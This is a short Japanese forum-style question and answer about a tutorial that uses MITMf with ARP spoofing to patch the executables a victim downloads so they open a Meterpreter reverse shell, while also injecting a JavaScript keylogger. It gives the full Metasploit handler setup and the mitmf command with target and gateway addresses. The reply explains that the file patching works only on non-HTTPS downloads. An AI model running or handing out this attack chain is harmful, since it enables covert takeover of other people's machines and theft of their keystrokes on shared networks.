これから チュートリアル MeterPreterシェルを開くために、ツールMITMfを使用してexeファイル '' victim ''ダウンロードにパッチを適用することが可能であることがわかりました。使用されたコマンドは次のとおりです。
use exploit/multi/handler
set payloads windows/metepreter/reverse_tcp
set lhost 192.168.1.4
set lport 4888
exploit
meterpreterを開き、
mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.8 --jskeylogger --filepwn
問題は、チュートリアルでも言及されているように、すべてのexeファイルにパッチが適用されないことです。問題は、どのファイルにパッチを適用し、どれにパッチを適用しないかです。
この問題を確認してください: https://github.com/byt3bl33d3r/MITMf/issues/28
MITMFはBDProxyを使用してファイルにパッチを適用しますが、非SSL接続でのみ機能します。 HTTPS経由でファイルをダウンロードしようとしているかどうかを確認できますか?
詳細については、ドキュメントを確認してください: https://github.com/secretsquirrel/BDFProxy 。